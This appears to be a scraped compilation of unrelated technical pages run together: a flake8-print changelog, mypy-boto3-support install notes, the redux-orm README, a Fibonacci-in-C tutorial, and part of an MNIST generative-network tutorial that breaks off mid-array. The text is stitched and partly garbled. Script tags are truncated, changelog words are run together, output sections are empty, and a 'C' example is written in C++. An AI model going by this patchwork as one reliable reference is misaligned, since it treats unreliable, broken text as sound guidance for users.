2.4.1 (pep8: 1.5.7, flake8-print: 2.0.0, mccabe: 0.3.1, pyflakes: 0.8.1)
Flake8 allows disabling some tests based on the folder:

[flake8]
per-file-ignores =
    scripts/*: T20
    cli.py: T20
Error codes
Changes
5.0.0 - 2022-04-30
- Move namespace from T0* to T2* to avoid collision with other library using same error code.
- Remove python 2 specific code paths, error messages and six usage.
4.0.1 - 2022-04-30
- Fixing bug with noqa detection by removing manual detection and relying on flake8 itself.
4.0.0 - 2020-11-29
- Opted back into using Poetry now that the existing issues have been fixed.
- Python 2.7 support was now officially dropped.
3.1.4 - 2019-1-11
- Fix bug introduced in 3.1.3
- Support for nopep8 comments
3.1.3 - 2019-10-31
- Swapped back from poetry to setup.py :(....python ecosystem issues....
- single function refactor code
3.1.1 - 2019-03-12
- Fix reading from stdin when it is closed (requires flake8 > 2.1).
- Add error codes to ReadMe.
- Swapped to poetry from setup.py
- Ran black on the repository
3.1.0 - 2018-02-11
- Add a framework classifier for use in pypi.org
- Fix entry_point in setup.py leaving it off by default again.
3.0.1 - 2017-11-06
- Fix conflict in setup.py leaving it off by default again.
- Fix bug in name code.
3.0.0 - 2017-11-05
- Remove some of the python 2/3 message differentiation.
- Use an AST rather than a logical line checker with a regex.
- pprint support.
- Loss of multiline noqa support, until there is a way to use both the AST and have flake8 provide the noqa lines.
2.0.2 - 2016-02-29
- Fix ReadMe for pipy
- Refactor, DRY it up.
- Update python 2 vs python 3 print statement styles.
2.0.1 - 2015-11-21
- Add back the decorator to fix the flake8 --version call.
2.0 - 2015-11-10
- Support noqa at end of multiline print statement
- Performance improvements
- Removed PrintStatementChecker class and other functions
- Added T101 for 'Python 2.x reserved word print used.'
- Added testing for Python 3.3 and 3.5, and different flake8 versions
1.6.1 - 2015-05-22
- Fix bug introduced in 1.6.
1.6 - 2015-05-18
- Added proper support for python3 and testing for python 2.6, 2.7 and 3.4
1.5 - 2014-11-04
- Added python2.6 support. Thanks @zoidbergwill
1.4 - 2014-10-06
- Added noqa support
1.3 - 2014-09-27
- Dropped noqa support
- Support for multiline comments and less false positives
1.2 - 2014-06-30
- Does not catch the word print in single line strings
- Does not catch inline comments with print in it
- Added tests
1.1 - 2014-06-30
- First release
1.0 - 2014-06-30
- Whoops
Source Distribution
flake8-print-5.0.0.tar.gz (5.2 kB)

Source: https://pypi.org/project/flake8-print/
Type annotations for boto3.Support 1.23.0 service generated with mypy-boto3-builder 7.5.14
Project description
mypy-boto3-support
Type annotations for the boto3 Support service. More information can be found in the mypy-boto3-support docs.
See how it helps to find and fix potential bugs.
From PyPI with pip

Install boto3-stubs for the Support service.
# install with boto3 type annotations
python -m pip install 'boto3-stubs[support]'

# Lite version does not provide session.client/resource overloads
# it is more RAM-friendly, but requires explicit type annotations
python -m pip install 'boto3-stubs-lite[support]'

# standalone installation
python -m pip install mypy-boto3-support
How to uninstall
python -m pip uninstall -y mypy-boto3-support
Usage
VSCode
- Install Python extension
- Install Pylance extension
- Set Pylance as your Python Language Server
- Install boto3-stubs[support] in your environment:
python -m pip install 'boto3-stubs[support]'
Both type checking and code completion should now work. No explicit type annotations required, write your boto3 code as usual.
PyCharm
Install boto3-stubs-lite[support] in your environment:

python -m pip install 'boto3-stubs-lite[support]'
- Install boto3-stubs[support] with the services you use in your environment:

python -m pip install 'boto3-stubs[support]'

- Install boto3-stubs[support] in your environment:

python -m pip install 'boto3-stubs[support]'
Type checking should now work. No explicit type annotations required, write your boto3 code as usual.
pyright
- Install pyright:

npm i -g pyright

- Install boto3-stubs[support] in your environment:
python -m pip install 'boto3-stubs[support]'
Optionally, you can install boto3-stubs to the typings folder.
Type checking should now work. No explicit type annotations required, write your boto3 code as usual.
Explicit type annotations
Client annotations
SupportClient provides annotations for boto3.client("support").
from boto3.session import Session

from mypy_boto3_support import SupportClient

client: SupportClient = Session().client("support")

# now client usage is checked by mypy and IDE should provide code completion
Paginators annotations
mypy_boto3_support.paginator module contains type annotations for all paginators.
from boto3.session import Session

from mypy_boto3_support import SupportClient
from mypy_boto3_support.paginator import (
    DescribeCasesPaginator,
    DescribeCommunicationsPaginator,
)

client: SupportClient = Session().client("support")

# Explicit type annotations are optional here
# Type should be correctly discovered by mypy and IDEs
# VSCode requires explicit type annotations
describe_cases_paginator: DescribeCasesPaginator = client.get_paginator("describe_cases")
describe_communications_paginator: DescribeCommunicationsPaginator = client.get_paginator("describe_communications")
Literals
mypy_boto3_support.literals module contains literals extracted from shapes that can be used in user code for type checking.
from mypy_boto3_support.literals import (
    DescribeCasesPaginatorName,
    DescribeCommunicationsPaginatorName,
    SupportServiceName,
    ServiceName,
    ResourceServiceName,
    PaginatorName,
)

def check_value(value: DescribeCasesPaginatorName) -> bool: ...
Typed dictionaries
mypy_boto3_support.type_defs module contains structures and shapes assembled to typed dictionaries for additional type checking.
from mypy_boto3_support.type_defs import (
    AddAttachmentsToSetRequestRequestTypeDef, AddAttachmentsToSetResponseTypeDef,
    AddCommunicationToCaseRequestRequestTypeDef, AddCommunicationToCaseResponseTypeDef,
    AttachmentDetailsTypeDef, AttachmentTypeDef,
    CaseDetailsTypeDef, CategoryTypeDef, CommunicationTypeDef,
    CreateCaseRequestRequestTypeDef, CreateCaseResponseTypeDef,
    DescribeAttachmentRequestRequestTypeDef, DescribeAttachmentResponseTypeDef,
    DescribeCasesRequestDescribeCasesPaginateTypeDef,
    DescribeCasesRequestRequestTypeDef, DescribeCasesResponseTypeDef,
    DescribeCommunicationsRequestDescribeCommunicationsPaginateTypeDef,
    DescribeCommunicationsRequestRequestTypeDef, DescribeCommunicationsResponseTypeDef,
    DescribeServicesRequestRequestTypeDef, DescribeServicesResponseTypeDef,
    DescribeSeverityLevelsRequestRequestTypeDef, DescribeSeverityLevelsResponseTypeDef,
    DescribeTrustedAdvisorCheckRefreshStatusesRequestRequestTypeDef,
    DescribeTrustedAdvisorCheckRefreshStatusesResponseTypeDef,
    DescribeTrustedAdvisorCheckResultRequestRequestTypeDef,
    DescribeTrustedAdvisorCheckResultResponseTypeDef,
    DescribeTrustedAdvisorCheckSummariesRequestRequestTypeDef,
    DescribeTrustedAdvisorCheckSummariesResponseTypeDef,
    DescribeTrustedAdvisorChecksRequestRequestTypeDef,
    DescribeTrustedAdvisorChecksResponseTypeDef,
    PaginatorConfigTypeDef, RecentCaseCommunicationsTypeDef,
    RefreshTrustedAdvisorCheckRequestRequestTypeDef,
    RefreshTrustedAdvisorCheckResponseTypeDef,
    ResolveCaseRequestRequestTypeDef, ResolveCaseResponseTypeDef,
    ResponseMetadataTypeDef, ServiceTypeDef, SeverityLevelTypeDef,
    TrustedAdvisorCategorySpecificSummaryTypeDef, TrustedAdvisorCheckDescriptionTypeDef,
    TrustedAdvisorCheckRefreshStatusTypeDef, TrustedAdvisorCheckResultTypeDef,
    TrustedAdvisorCheckSummaryTypeDef, TrustedAdvisorCostOptimizingSummaryTypeDef,
    TrustedAdvisorResourceDetailTypeDef, TrustedAdvisorResourcesSummaryTypeDef,
)

def get_structure() -> AddAttachmentsToSetRequestRequestTypeDef: ...
Source: https://pypi.org/project/mypy-boto3-support/
redux-orm
A small, simple and immutable ORM to manage relational data in your Redux store.
See a guide to creating a simple app with Redux-ORM (includes the source). Its README is not updated for 0.9 yet, but the code has a branch for it.

Version 0.9, which is in the release candidate stage, brings big breaking changes to the API. Please look at the migration guide if you're migrating from earlier versions.

Looking for the 0.8 docs? Read the old README.md in the repo. For the API reference, clone the repo, run npm install and make build, and open up index.html in your browser. Sorry for the inconvenience.
API can be unstable until 1.0.0. Minor version bumps before 1.0.0 can and will introduce breaking changes. They will be noted in the changelog.
Extensions

redux-orm-proptypes: React PropTypes validation and defaultProps mixin for Redux-ORM Models

Installation

npm install redux-orm --save
Or with a script tag
<script src="
Usage

Declare Your Models

You can declare your models with the ES6 class syntax, extending from Model. You need to declare all your non-relational fields on the Model, and declaring all data fields is recommended as the library doesn't have to redefine getters and setters when instantiating Models.

redux-orm supports one-to-one and many-to-many relations in addition to foreign keys (oneToOne, many and fk imports respectively). Non-related properties can be accessed like in normal JavaScript objects.

// models.js
import { fk, many, attr, Model } from 'redux-orm';

class Book extends Model {
    toString() {
        return `Book: ${this.name}`;
    }
    // Declare any static or instance methods you need.
}
Book.modelName = 'Book';

// Declare your related fields.
Book.fields = {
    id: attr(), // non-relational field for any value; optional but highly recommended
    name: attr(),
    authors: many('Author', 'books'),
    publisher: fk('Publisher', 'books'),
};
Register Models and Generate an Empty Database State

Defining fields on a Model specifies the table structure in the database for that Model. In order to generate a description of the whole database's structure, we need a central place to register all Models we want to use.

An instance of the ORM class registers Models and handles generating a full schema from all the models and passing that information to the database. Often you'll want to have a file where you can import a single ORM instance across the app, like this:

// orm.js
import { ORM } from 'redux-orm';
import { Book, Author, Publisher } from './models';

const orm = new ORM();
orm.register(Book, Author, Publisher);

export default orm;

You could also define and register the models to an ORM instance in the same file, and export them all.

Now that we've registered Models, we can generate an empty database state. Currently that's a plain, nested JavaScript object that is structured similarly to relational databases.

// index.js
import orm from './orm';

const emptyDBState = orm.getEmptyState();
Applying Updates to the Database

When we have a database state, we can start an ORM session on that to apply updates. The ORM instance provides a session method that accepts a database state as its sole argument, and returns a Session instance.

const session = orm.session(emptyDBState);

Session-specific classes of registered Models are available as properties of the session object.

const Book = session.Book;

Models provide an interface to query and update the database state.

Book.withId(1).update({ name: 'Clean Code' });
Book.all().filter(book => book.name === 'Clean Code').delete();
Book.hasId(1) // false

The initial database state is not mutated. A new database state with the updates applied can be found on the state property of the Session instance.
const updatedDBState = session.state;
Redux Integration

To integrate Redux-ORM with Redux at the most basic level, you can define a reducer that instantiates a session from the database state held in the Redux atom, then when you've applied all of your updates, you can return the next state from the session.

import { orm } from './models';

function ormReducer(dbState, action) {
    const sess = orm.session(dbState);

    // Session-specific Models are available
    // as properties on the Session instance.
    const { Book } = sess;

    switch (action.type) {
    case 'CREATE_BOOK':
        Book.create(action.payload);
        break;
    case 'UPDATE_BOOK':
        Book.withId(action.payload.id).update(action.payload);
        break;
    case 'REMOVE_BOOK':
        Book.withId(action.payload.id).delete();
        break;
    }

    // the state property of Session always points to the current database.
    // Updates don't mutate the original state, so this reference is not
    // equal to `dbState` that was an argument to this reducer.
    return sess.state;
}

Previously Redux-ORM advocated for reducers specific to Models by attaching a static reducer function on the Model class. If you want to define your update logic on the Model classes, you can specify a reducer static method on your model which accepts the action as the first argument, the session-specific Model as the second, and the whole session as the third.

class Book extends Model {
    static reducer(action, Book, session) {
        switch (action.type) {
        case 'CREATE_BOOK':
            Book.create(action.payload);
            break;
        case 'UPDATE_BOOK':
            Book.withId(action.payload.id).update(action.payload);
            break;
        case 'REMOVE_BOOK': {
            const book = Book.withId(action.payload);
            book.delete();
            break;
        }
        }
        // Return value is ignored.
        return undefined;
    }

    toString() {
        return `Book: ${this.name}`;
    }
}

To get a reducer for Redux that calls these reducer methods:

import { createReducer } from 'redux-orm';
import { orm } from './models';

const reducer = createReducer(orm);

createReducer is really simple, so I'll just paste the source here.

function createReducer(orm, updater = defaultUpdater) {
    return (state, action) => {
        const session = orm.session(state || orm.getEmptyState());
        updater(session, action);
        return session.state;
    };
}

function defaultUpdater(session, action) {
    session.sessionBoundModels.forEach(modelClass => {
        if (typeof modelClass.reducer === 'function') {
            modelClass.reducer(action, modelClass, session);
        }
    });
}

As you can see, it just instantiates a new Session, loops through all the Models in the session, and calls the reducer method if it exists. Then it returns the new database state that has all the updates applied.
Use with React

Use memoized selectors to make queries into the state.

redux-orm uses smart memoization: the below selector accesses the Author and AuthorBooks branches (AuthorBooks is a many-to-many branch generated from the model field declarations), and the selector will be recomputed only if those branches change. The accessed branches are resolved on the first run.

// selectors.js
import schema from './schema';

const authorSelector = schema.createSelector(session => {
    return session.Author.map(author => {
        // Returns a reference to the raw object in the store,
        // so it doesn't include any reverse or m2m fields.
        const obj = author.ref;
        // Object.keys(obj) === ['id', 'name']

        return Object.assign({}, obj, {
            books: author.books.withRefs.map(book => book.name),
        });
    });
});

// Will result in something like this when run:
// [
//   {
//     id: 0,
//     name: 'Tommi Kaikkonen',
//     books: ['Introduction to redux-orm', 'Developing Redux applications'],
//   },
//   {
//     id: 1,
//     name: 'John Doe',
//     books: ['John Doe: an Autobiography'],
//   },
// ]

Selectors created with createSelector can be used as input to any additional reselect selectors you want to use. They are also great to use with redux-thunk: get the whole state with getState(), pass the ORM branch to the selector, and get your results. A good use case is serializing data to a custom format for a 3rd party API call.

Because selectors are memoized, you can use pure rendering in React for performance gains.

// components.js
import PureComponent from 'react-pure-render/component';
import { authorSelector } from './selectors';
import { connect } from 'react-redux';

class App extends PureComponent {
    render() {
        const authors = this.props.authors.map(author => {
            return (
                <li key={author.id}>
                    {author.name} has written {author.books.join(', ')}
                </li>
            );
        });

        return (
            <ul>
                {authors}
            </ul>
        );
    }
}

function mapStateToProps(state) {
    return {
        authors: authorSelector(state.orm),
    };
}

export default connect(mapStateToProps)(App);
Understanding redux-orm

An ORM?

Well, yeah.

redux-orm deals with related data, structured similarly to a relational database. The database in this case is a simple JavaScript object database.

Why?

For simple apps, writing reducers by hand is alright, but when the number of object types you have increases and you need to maintain relations between them, things get hairy. ImmutableJS goes a long way to reduce complexity in your reducers, but redux-orm is specialized for relational data.
Immutability

Say we start a session from an initial database state situated in the Redux atom, and update the name of a certain book.

First, a new session:

import { orm } from './models';

const dbState = getState().db; // getState() returns the redux state.
const sess = orm.session(dbState);

The session maintains a reference to a database state. We haven't updated the database state, therefore it is still equal to the original state.

sess.state === dbState // true

Let's apply an update.

const book = sess.Book.withId(1)
book.name // 'Refactoring'

book.name = 'Clean Code'
book.name // 'Clean Code'

sess.state === dbState // false.

The update was applied, and because the session does not mutate the original state, it created a new one and swapped sess.state to point to the new one.

Let's update the database state again through the ORM.

// Save this reference so we can compare.
const updatedState = sess.state;

book.name = 'Patterns of Enterprise Application Architecture'

sess.state === updatedState // true

If possible, future updates are applied with mutations. In this case, the database was already mutated, so the pointer doesn't need to change. If you want to avoid making mutations to a session state, take the session state and start a new session with that state.
Customizability

Just like you can extend Model, you can do the same for QuerySet (customize methods on Model instance collections). You can also specify the whole database implementation yourself (documentation pending).
Caveats

The ORM abstraction will never be as performant as writing reducers by hand, and it adds to the build size of your project (last I checked, minimizing the source files and gzipping yielded about 8 KB). If you have very simple data without relations, redux-orm may be overkill. The development convenience benefit is considerable though.
API

ORM

See the full documentation for ORM here

Instantiation

const orm = new ORM(); // no arguments needed.

Instance methods:

- register(...models: Array<Model>): registers Model classes to the ORM instance.
- session(state: any): begins a new Session with state.
Redux Integration

- createReducer(orm: ORM): returns a reducer function that can be plugged into Redux. The reducer will return the next state of the database given the provided action. You need to register your models before calling this.
- createSelector(orm: ORM, [...inputSelectors], selectorFunc): returns a memoized selector function for selectorFunc. selectorFunc receives session as the first argument, followed by any inputs from inputSelectors. Read the full documentation for details.
Model

See the full documentation for Model here.

Instantiation: Don't instantiate directly; use the class method create.

Class Methods:

- hasId(id): returns a boolean indicating if an entity with id id exists in the state.
- withId(id): gets the Model instance with id id.
- get(matchObj): gets a Model instance based on matching properties in matchObj.
- create(props): creates a new Model instance with props. If you don't supply an id, the new id will be Math.max(...allOtherIds) + 1.

You will also have access to almost all QuerySet instance methods from the class object for convenience.
Instance Attributes:
ref: returns a direct reference to the plain JavaScript object representing the Model instance in the store.
Instance methods:
- equals(otherModel): returns a boolean indicating equality with otherModel. Equality is determined by shallow comparison of both models' attributes.
- set(propertyName, value): updates propertyName to value. Returns undefined. Is equivalent to normal assignment.
- update(mergeObj): merges mergeObj with the Model instance properties. Returns undefined.
- delete(): deletes the record for this Model instance in the database. Returns undefined.
Subclassing:

Use the ES6 syntax to subclass from Model. Any instance methods you declare will be available on Model instances. Any static methods you declare will be available on the Model class in Sessions.

For the related field declarations, either set the fields property on the class or declare a static getter that returns the field declarations like this:

Declaring fields:

class Book extends Model {
    static get fields() {
        return {
            id: attr(),
            name: attr(),
            author: fk('Author'),
        };
    }
}

// alternative:
Book.fields = {
    id: attr(),
    name: attr(),
    author: fk('Author'),
}

All the fields fk, oneToOne and many take a single argument, the related model name. The fields will be available as properties on each Model instance. You can set related fields with the id value of the related instance, or the related instance itself.

For fk, you can access the reverse relation through author.bookSet, where the related name is ${modelName}Set. Same goes for many. For oneToOne, the reverse relation can be accessed through just the model name the field was declared on: author.book.

For many field declarations, accessing the field on a Model instance will return a QuerySet with two additional methods: add and remove. They take one or more arguments, where the arguments are either Model instances or their ids. Calling these methods records updates that will be reflected in the next state.
When declaring model classes, always remember to set the modelName property. It needs to be set explicitly, because running your code through a mangler would otherwise break functionality. The modelName will be used to resolve all related fields.

Declaring modelName:

class Book extends Model {
    static get modelName() {
        return 'Book';
    }
}

// alternative:
Book.modelName = 'Book';

Declaring options:

If you need to specify options to the redux-orm database, you can declare a static options property on the Model class with an object value. Currently you can specify the id attribute name:

// This is the default value.
Book.options = {
    idAttribute: 'id',
};
QuerySet

See the full documentation for QuerySet here.

You can access all of these methods straight from a Model class, as if they were class methods on Model. In this case the functions will operate on a QuerySet that includes all the Model instances.

Instance methods:

- toRefArray(): returns the objects represented by the QuerySet as an array of plain JavaScript objects. The objects are direct references to the store.
- toModelArray(): returns the objects represented by the QuerySet as an array of Model instances.
- count(): returns the number of Model instances in the QuerySet.
- exists(): returns true if the number of entities is more than 0, else false.
- filter(filterArg): returns a new QuerySet representing the records from the parent QuerySet that pass the filter. For filterArg, you can either pass an object that redux-orm tries to match to the entities, or a function that returns true if you want to have it in the new QuerySet, false if not. The function receives a model instance as its sole argument.
- exclude(filterArg): returns a new QuerySet representing entities in the parent QuerySet that do not pass the filter. Similarly to filter, you may pass an object for matching (all entities that match will not be in the new QuerySet) or a function. The function receives a model instance as its sole argument.
- all(): returns a new QuerySet with the same entities.
- at(index): returns a Model instance at the supplied index in the QuerySet.
- first(): returns a Model instance at the 0 index.
- last(): returns a Model instance at the querySet.count() - 1 index.
- delete(): deletes all entities represented by the QuerySet.
- update(mergeObj): updates all entities represented by the QuerySet based on the supplied object. The object will be merged with each entity.
Session

See the full documentation for Session here

Instantiation: you don't need to do this yourself. Use orm.session.

Instance properties:

- state: the current database state in the session.

Additionally, you can access all the registered Models in the schema for querying and updates as properties of this instance. For example, given a schema with Book and Author models:

const session = orm.session(state);

session.Book // Model class: Book
session.Author // Model class: Author

session.Book.create({id: 5, name: 'Refactoring', release_year: 1999});
Changelog

Minor changes before 1.0.0 can include breaking changes.

0.9.0

A lot. See the migration guide.
0.8.4

Adds a UMD build to partially fix #41. You can now use or try out redux-orm through a script tag:
<script src="
redux-orm.js will point to the master version of the library; If you need to stick to a version, make a copy or build it yourself.
0.8.3

Fixed a bug that mutated the backend options in Model if you supplied custom ones, see Issue 37. Thanks to @diffcunha for the fix!
0.8.2

Fixed a regression in Model.prototype.update
0.8.1

Added babel-runtime to dependencies
0.8.0

Adds batched mutations. This is a big performance improvement. Previously adding 10,000 objects would take 15s, now it takes about 0.5s. Batched mutations are implemented using immutable-ops internally.

Breaking changes:

- Removed the indexById option from Backend. This means that data will always be stored in both an array of ids and a map of id => entity, which was the default setting. If you didn't explicitly set indexById to false, you don't need to change anything.
- Batched mutations brought some internal changes. If you had custom Backend or Session classes, or have overridden Model.getNextState, please check out the diff.
0.7.0

Breaking changes:

Model classes that you access in reducers and selectors are now session-specific. Previously the user-defined Model class reference was used for sessions, with a private session property changing based on the most recently created session. Now Model classes are given a unique dummy subclass for each session. The subclass will be bound to that specific session. This allows multiple sessions to be used at the same time.
You most likely don't need to change anything. The documentation was written with this feature in mind from the start. As long as you've used the model class references given to you in reducers and selectors as arguments (not the reference to the model class you defined), you're fine.
0.6.0

Breaking changes:

- When calling QuerySet.filter or QuerySet.exclude with an object argument, any values of that object that look like a Model instance (i.e. they have a getId property that is a function) will be turned into the id of that instance before performing the filtering or excluding.
E.g.
Book.filter({ author: Author.withId(0) });
Is equivalent to
Book.filter({ author: 0 });
0.5.0

Breaking changes:

- Model instance method equals(otherModel) now checks if the two models' attributes are shallow equal. Previously, it checked if the ids and model classes are equal.
- Session constructor now receives a Schema instance as its first argument, instead of an array of Model classes (this only affects you if you're manually instantiating Sessions with the new operator).

Other changes:

- Added a hasId static method to the Model class. It tests for the existence of the supplied id in the model's state.
- Added instance method getNextState to the Session class. This enables you to get the next state without running model-reducers. Useful if you're bootstrapping data, writing tests, or otherwise operating on the data outside reducers. You can pass an options object that currently accepts a runReducers key. Its value indicates if reducers should be run or not.
- Improved API documentation.
0.4.0

- Fixed a bug that mutated props passed to Model constructors, which could be a reference from the state. I highly recommend updating from 0.3.1.
- API cleanup, see breaking changes below.
- Calling getNextState is no longer mandatory in your Model reducers. If your reducer returns undefined, getNextState will be called for you.

Breaking changes:

- Removed static methods Model.setOrder() and Backend.order. If you want ordered entities, use the QuerySet instance method orderBy.
- Added helpful error messages when trying to add a duplicate many-to-many entry (Model.someManyRelated.add(...)), trying to remove a nonexistent many-to-many entry (Model.exampleManyRelated.remove(...)), or creating a Model with duplicate many-to-many entry ids (Model.create(...)).
- Removed the ability to supply a mapping function to the QuerySet instance method update. If you need to record updates dynamically based on each entity, iterate through the objects with forEach and record updates separately:

const authors = publisher.authors;
authors.forEach(author => {
    const isAdult = author.age >= 18;
    author.update({ isAdult });
})

or use the ability to merge an object with all objects in a QuerySet. Since the update operation is batched for all objects in the QuerySet, it can be more performant with a large amount of entities:

const authors = publisher.authors;
const isAdult = author => author.age >= 18;

const adultAuthors = authors.filter(isAdult);
adultAuthors.update({ isAdult: true });

const youngAuthors = authors.exclude(isAdult);
youngAuthors.update({ isAdult: false });
0.3.1

A descriptive error is now thrown when a reverse field conflicts with another field declaration. For example, the following schema:

class A extends Model {}
A.modelName = 'A';

class B extends Model {}
B.modelName = 'B';
B.fields = {
    field1: one('A'),
    field2: one('A'),
};

would try to define the reverse field b on A twice, throwing an error with an undescriptive message.
0.3.0

Breaking changes:

- Model.withId(id) now throws if an object with id id does not exist in the database.
0.2.00.2.0
Includes various bugfixes and improvements.
Breaking changes:
- Replaced
plainand
modelsinstance attributes in
QuerySetwith
withRefsand
withModelsrespectively. The attributes return a new
QuerySetinstead of modifying the existing one. A
refalias is also added for
withRefs, so you can do
Book.ref.at(2).
- After calling
filter,
excludeor
orderBymethod on a
QuerySetinstance, the
withRefsflag is always flipped off so that calling the same methods on the returned
QuerySetwould use model instances in the operations. Previously the flag value remained after calling those methods.
.toPlain()from
QuerySetis renamed to
.toRefArray()for clarity.
- Added
.toModelArray()method to
QuerySet.
- Removed
.objects()method from
QuerySet. Use
.toRefArray()or
.toModelArray()instead.
- Removed .toPlain() method from Model, which returned a copy of the Model instance's property values. To replace that, a ref instance getter was added. It returns a reference to the plain JavaScript object in the database. So you can do Book.withId(0).ref. If you need a copy, you can do Object.assign({}, Book.withId(0).ref).
- Removed .fromEmpty() instance method from Schema.
- Removed .setReducer() instance method from Schema. You can just do ModelClass.reducer = reducerFunc;.
License
MIT. See
LICENSE.
If you've ever had a programming interview, you're aware that many C programming interviews include a question about writing a program for the Fibonacci sequence. Many people get perplexed by this seemingly basic question. In this article, we'll look at how to use the Fibonacci sequence in C.
What is a Fibonacci Series?
The Fibonacci sequence is a set of numbers that is generated by adding the two numbers before it. Zero and one are the first two terms, respectively. The terms that follow are created by simply adding the two terms before them.
The Fibonacci Series programme may be written in two ways:
- Fibonacci Series without recursion
- Fibonacci Series using recursion
How to Calculate Fibonacci and its Mathematical Representation?
The Fibonacci Sequence or Series is a set of numbers in which each number is formed by adding the two numbers that precede it. The Fibonacci numbers form the integer sequence 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, and so on.
By combining the two numbers preceding it, the following number is found; 2 is equal to the sum of the two numbers before it (1+1), 3 is equal to the sum of the two numbers before it (1+2), 5 is equal to the sum of the two numbers before it (2+3), and so on.
An example of a Fibonacci sequence is as follows: 0, 1, 1, 2, 3, 5, 8, 13
The first two terms of the series in the previous example are 0 and 1. These two terms are printed immediately. The first two terms are combined to form the third term: since they are 0 and 1, we get 0+1=1. As a result, the third term is written as 1. Each following term is created from the two terms before it, not from the initial terms. This continues until the requested number of terms is reached. We used eight terms in the above example.
Example
#include<stdio.h>
int main()
{
int first=0, second=1, i, n, sum=0;
printf("Enter the number of terms: ");
scanf("%d",&n);
//accepting the terms
printf("Fibonacci Series:");
for(i=0 ; i<n ; i++)
{
if(i <= 1)
{
sum=i;
}
//to print 0 and 1
else
{
sum=first + second;
first=second;
second=sum;
//to calculate the remaining terms.
//value of first and second changes as a new term is printed.
}
printf(" %d",sum);
}
return 0;
}
Output
In the above program, all variables are declared first. We set the values of the first and second variables, which will be used to produce further terms. The variable n keeps track of the number of terms, sum holds the sum of the two preceding terms, and i is the loop counter used in the for loop. We take the user's number of terms and store it in n. Then, a for loop runs from 0 to the number of terms the user requested, which is n.
We first have an if statement within the for loop, with the condition checking whether the value of i is less than or equal to 1. Depending on the value, either zero or one is printed. This is used to print the initial zero and one when there are more than two terms.
The else part of the loop is executed if the number of terms is greater than one. The sum of the variables first and second is assigned to the variable sum in this section; the sum variable holds the next term. For example, if the first and second values are 0 and 1, the sum value will be 1.
How a Program to Calculate Fibonacci Works?
The program to calculate Fibonacci works as a straightforward recursive implementation of the mathematical recurrence relation mentioned above.
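The recurrence relation referred to above, with the standard base cases, is:

```latex
F(0) = 0, \qquad F(1) = 1, \qquad F(n) = F(n-1) + F(n-2) \quad \text{for } n \ge 2
```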
Example
//Fibonacci Series using Recursion
#include<bits/stdc++.h>
using namespace std;
int fib(int n)
{
if (n <= 1)
return n;
return fib(n-1) + fib(n-2);
}
int main ()
{
int n = 7;
cout << fib(n);
getchar();
return 0;
}
Output
The above example shows that this implementation does a lot of repeated work (see the following recursion tree)
Recursion Tree
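The repeated work shown by the recursion tree can be eliminated with memoization: cache each fib(n) the first time it is computed, so every value is computed at most once. A minimal sketch, in Python for brevity (the same idea works in C with an array as the cache):

```python
from functools import lru_cache

@lru_cache(maxsize=None)  # remembers every fib(n) already computed
def fib(n):
    if n <= 1:
        return n
    return fib(n - 1) + fib(n - 2)

print(fib(7))   # -> 13
print(fib(40))  # fast: each value is computed once instead of millions of calls
```

With memoization the running time drops from exponential to linear in n.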
Fibonacci Series in C Without Recursion
The goto statement is a type of jump statement that is also known as an unconditional jump statement. Within a function, it can be used to hop from one place to another. The steps are as follows:
// C program to print Fibonacci Series
// using goto statement
#include <stdio.h>
// Function to print Fibonacci Number
// using goto statement
void fibUsingGoto(int N)
{
int a = 0, b = 1, sum = 0;
labelFib:
// Print the first N terms of the series
if (N != 0) {
// Print series
printf(" %d", a);
// Create next term
sum = a + b;
a = b;
b = sum;
// Decrement N
N--;
goto labelFib;
}
}
// Driver Code
int main()
{
// Given number N
int N = 10;
// Function Call
fibUsingGoto(N);
return 0;
}
Output
Fibonacci Series in C Using Recursion
Declare three variables a, b, and sum as 0, 1, and 0 respectively. Call the fib() function recursively with the first term, the second term, and the current sum of the Fibonacci sequence. After the main function calls fib(), the fib() function calls itself until the first N values of the Fibonacci series have been computed. In each recursive call, update the values of a, b, and sum as shown below:
// C program to print fibonacci
// series using recursion
#include <stdio.h>
// Recursive function to print
// Fibonacci series
void fib(int a, int b, int sum, int N)
{
// Print first N term of the series
if (N != 0) {
printf(" %d", a);
sum = a + b;
a = b;
b = sum;
// Decrement N
N--;
// recursive call function fib
fib(a, b, sum, N);
}
}
// Driver Code
int main()
{
// Given Number N
int N = 10;
// First term as 0
// Second term as 1 and
// Sum of first and second term
fib(0, 1, 0, N);
return 0;
}
Output
Conclusion
Learning about the Fibonacci sequence gives a programmer an understanding of how to solve certain problems that require a solution built up from a base case. This is also the reason why it is so famous and relevant in the programming world. Want to learn more about such interesting concepts and sharpen your programming skills by learning more advanced topics?
Enroll in Simplilearn’s Full-Stack Web Development Certification Course, to get more grasp on concepts like these with our well curated videos and practical examples. This certification course provides training in almost 30 programming languages and tools and will help you get the mastery in multiple development skills required to become a full-stack developer and land an opportunity to work for the biggest companies in the software development world.
You can also explore our skill up courses platform where we offer numerous free courses in multiple programming languages to help you brush up and improve your coding skills.
Hello and welcome to part 4 of our series of having some fun with neural networks, currently with generative networks. Where we left off, we were building the dataset that we intend to use with our mnist generative model. We left off with quite a few questions. Typically, with ML algorithms, our data needs to be structured in a very specific way. With this generative network, and our goals, we actually have a lot of options for how we want to do this. The format can be anything, and our only goal is really to try to make this as easy as possible for the model to understand.
Right now, our images, being 28x28, are sequences of 28x28 values, which means a full image would be 784 characters at a minimum, unless we resize them. That said, our array has extra things like brackets, and spaces between each value. I think a good next step would be to remove the spaces. I cannot imagine any reason why these spaces are meaningful or why they'd be helpful to our model; I think they'll just waste our processing. Let's get rid of them! We should be able to just do:
print(str(pixels).replace(' ',''))
Making our full script:

from tensorflow.examples.tutorials.mnist import input_data
import matplotlib.pyplot as plt
import numpy as np

mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
batch_xs, batch_ys = mnist.train.next_batch(100)

data = np.rint(batch_xs[0]).astype(int)
label = np.rint(batch_ys[0]).astype(int)
pixels = data.reshape((28,28))

print(data)
print(label)
print(str(pixels).replace(' ',''))

plt.imshow(pixels, cmap='gray')
plt.show()
Interestingly, the image I got this time was:
The cleaned array is:
[[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000000000000000000000000]
[0000000001110000000000000000]
[0000000001111110000000000000]
[0000000000111111100000000000]
[0000000000011111110000000000]
[0000000000001111111000000000]
[0000000000000111111100000000]
[0000000000000011111100000000]
[0000000000000001111100000000]
[0000000000000000111100000000]
[0000001111111000111110000000]
[0000011111111111111110000000]
[0000011100111111111110000000]
[0000011100110011111110000000]
[0000011110110000011111000000]
[0000001111110000011111110000]
